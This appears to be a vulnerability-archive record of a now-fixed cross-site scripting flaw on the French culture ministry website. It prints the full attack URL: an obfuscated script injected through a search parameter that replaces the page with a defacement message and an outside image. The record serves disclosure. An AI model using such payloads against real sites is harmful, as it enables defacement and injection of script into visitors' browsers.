Security researcher Conslight, has submitted on 03/01/2014 a cross-site-scripting (XSS) vulnerability affecting www.culture.gouv.fr, which at the time of submission ranked 38558 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 12/03/2015. It is currently fixed. |
| Date submitted: 03/01/2014 |
Date published: 12/03/2015 |
Date fixed: 12/03/2015 | Status:  FIXED |
| Author: Conslight |
Domain: www.culture.gouv.fr |
Category: XSS |
Pagerank: 38558 |
|---|
URL: http://www.culture.gouv.fr/public/mistral/merimee_fr?ACTION=CHERCHER&FIELD_1=REF&VALUE_1=%22%27%3E%2
2%27%3E%22%27%3E%3Cscript%3Edocument.body.innerHTML=String.fromCharCode%2860,%2099,%20101,%20110,%20
116,%20101,%20114,%2062,%2060,%20104,%2049,%2062,%2067,%20111,%20110,%20115,%20108,%20105,%20103,%20
104,%20116,%2032,%20112,%20119,%20110,%20100,%2032,%20117,%2033,%2032,%2058,%2068,%2060,%2047,%20104
,%2049,%2062,%2060,%2098,%20114,%2062,%2060,%20104,%20114,%2062,%2060,%2098,%20114,%2062,%2060,%2010
4,%2050,%2062,%2035,%2084,%20104,%20101,%2032,%2072,%2097,%2099,%20107,%20101,%20114,%20115,%2032,%2
066,%2097,%20121,%2060,%2047,%20104,%2050,%2062,%2060,%20104,%20114,%2062,%2060,%20105,%20109,%20103
,%2032,%20115,%20114,%2099,%2061,%2039,%20104,%20116,%20116,%20112,%2058,%2047,%2047,%20105,%20109,%
20103,%2046,%20103,%2097,%20119,%20107,%20101,%20114,%2097,%20115,%20115,%20101,%20116,%20115,%2046,
%2099,%20111,%20109,%2047,%20105,%20109,%20103,%2047,%2049,%2055,%20122,%2048,%20105,%2099,%2055,%20
49,%2099,%20113,%2049,%2052,%2057,%20106,%20112,%20103,%2047,%20107,%20117,%2045,%20120,%20108,%2097
,%20114,%20103,%20101,%2046,%20106,%20112,%20103,%2039,%2060,%2047,%2099,%20101,%20110,%20116,%20101
,%20114,%2062%29%3C/script%3E |
|
Click here to view the mirror
|
|
|
